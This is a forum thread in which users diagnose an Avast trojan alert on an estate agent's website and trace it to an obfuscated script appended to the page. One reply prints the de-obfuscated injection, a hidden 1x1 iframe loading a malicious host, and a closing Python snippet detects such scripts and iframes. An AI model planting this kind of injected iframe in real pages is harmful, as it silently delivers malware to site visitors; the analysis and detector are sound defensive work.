Trojan Blocked

jim22
jim22 Posts: 1,227 Forumite
Hello, Avast Free has just reported that it has blocked this Trojan - JS IFRAME-AC TRJ

EXPLORE\IEXPLORE.EXE

If this is real and not a false positive, why on earth would there be this kind of threat on the pages of a South Wales estate agent?

Do the devils who put these threats on sites just choose indiscriminately? How do they put them there? Thanks.

Comments

  • stilltheone
    stilltheone Posts: 2,131 Forumite
    Some websites are easier to hack than others?
  • spg_SCOTT
    spg_SCOTT Posts: 171 Forumite
    It is not an alert on "EXPLORE\IEXPLORE.EXE" (i.e. Internet Explorer). That is just the process that is accessing the site.

    It is an alert on whatever site you are browsing.

    If you post the site link but make it unclickable by changing http to hXXp I could take a look.
    -Scott-

    “There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” Richard Feynman
  • jim22
    jim22 Posts: 1,227 Forumite
    Thanks Scott - hxxp://www.curatech.net/evansjones/ they are an estate agents in Kenfig Hill, Bridgend
  • RussJK
    RussJK Posts: 2,359 Forumite
    edited 14 June 2011 at 11:09PM
    jim22 wrote: »
    Thanks Scott - hxxp://www.curatech.net/evansjones/ they are an estate agents in Kenfig Hill, Bridgend

    Links to 89.208.149.214, which is presumably the site that caused the trojan to download. You're lucky that Avast was able to detect it.

    Might be worth a quick scan with Malwarebytes in case you also downloaded something that wasn't detected.
  • spg_SCOTT
    spg_SCOTT Posts: 171 Forumite
    Not a false positive, detection is correct.

    Just for info, the source of the site in a text file:
    http://www.virustotal.com/file-scan/report.html?id=d23a63b99af1fa96fea2edeb0d3d484db9e4c399222540cc0d5fd3f0e53124e3-1308088565

    At the very end of the page, beyond the closing html tags, there is an obfuscated script which is what is causing the alert.
    http://dl.dropbox.com/u/3105891/Pics/infections/curatech.gif

    This also exists on the home page (no evansjones on the URL), so is probably elsewhere in the site too...
    -Scott-
  • jim22
    jim22 Posts: 1,227 Forumite
    Thanks Scott, I've run a Malwarebytes scan which reports nothing. Any idea how or why this infection is lodged on this site?
  • asbokid
    asbokid Posts: 2,008 Forumite
    edited 15 June 2011 at 2:43AM
    Hi Jim!

    Because of the nature of HTTP (the web protocol), objects referenced in a webpage are often hosted off-site.

    All that is needed is an attack vector in a remotely-hosted object. That could be a maliciously crafted image that crashes the image rendering software on your PC which allows 'the execution of arbitrary code'.

    This image here, for example... it could be hosted on MSE.COM, or evansjones.com, but it's actually hosted on number10.gov.uk! Unless you disable the display of all images in your browser, or you scrutinise every image before it is downloaded and displayed, there is no way of telling whether it has malicious content.

    history-tour-188.jpg
  • RussJK
    RussJK Posts: 2,359 Forumite
    spg_SCOTT wrote: »

    Sure makes an argument against the strength of "common sense" in protecting against viruses, seeing how few detect obfuscated code...
  • jim22
    jim22 Posts: 1,227 Forumite
    Thanks everybody. Should I ring this estate agent and tell them that their site is infected, for the benefit of their customers? Mind you, they might blame me.
  • asbokid
    asbokid Posts: 2,008 Forumite
    edited 15 June 2011 at 12:22AM
    spg_SCOTT wrote: »
    At the very end of the page, beyond the closing html tags, there is an obfuscated script which is what is causing the alert.
    http://dl.dropbox.com/u/3105891/Pics/infections/curatech.gif

    De-obfuscated, that script reads...
    document.write('<iframe src="hxxp://sivassigorta.com/forum.php?tp=8c605c6bfdd9b2f5" width="1" height="1" frameborder="0"></iframe>')
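
A check a site owner could run over their own page source for the two signs described in this thread, a script sitting after the closing html tag and an iframe sized 1x1, given here as an added example that is not part of the original discussion. The hint list, function name and sample pages are constructed assumptions; the sample payload is an inert placeholder.

```python
import re

# Heuristic markers often present in obfuscated injected scripts (assumed list).
OBFUSCATION_HINTS = re.compile(r"\b(eval|unescape|fromCharCode|document\.write)\b")
CLOSE_HTML = re.compile(r"</html\s*>", re.I)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]+)""")


def scan_page(html):
    """Return a list of (finding, detail) tuples for one page's source."""
    findings = []
    # 1. A script after the last </html> has no legitimate reason to be there.
    closes = list(CLOSE_HTML.finditer(html))
    if closes:
        tail = html[closes[-1].end():]
        for m in SCRIPT.finditer(tail):
            hints = sorted(set(OBFUSCATION_HINTS.findall(m.group(1))))
            findings.append(("script-after-html", ",".join(hints) or "no-hints"))
    # 2. Iframes sized so the visitor cannot see them (0 or 1 pixel each way).
    for m in IFRAME.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(m.group(0))}
        if attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1"):
            findings.append(("hidden-iframe", attrs.get("src", "")))
    return findings


# Constructed sample input: a clean page, the same page with a script appended
# after </html>, and the page as it would look once a 1x1 iframe is present.
CLEAN = "<html><body><h1>Properties</h1></body></html>\n"
INFECTED = CLEAN + '<script>eval(unescape("%70%6c%61%63%65"))</script>'
FRAMED = CLEAN.replace(
    "</body>",
    '<iframe src="http://example.invalid/x" width="1" height="1" '
    'frameborder="0"></iframe></body>',
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("infected", INFECTED), ("framed", FRAMED)):
        print(name, scan_page(page))
```

A finding here is a prompt to compare the served file against a known-good copy, since the same script may have been appended to other pages on the site.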
    
This discussion has been closed.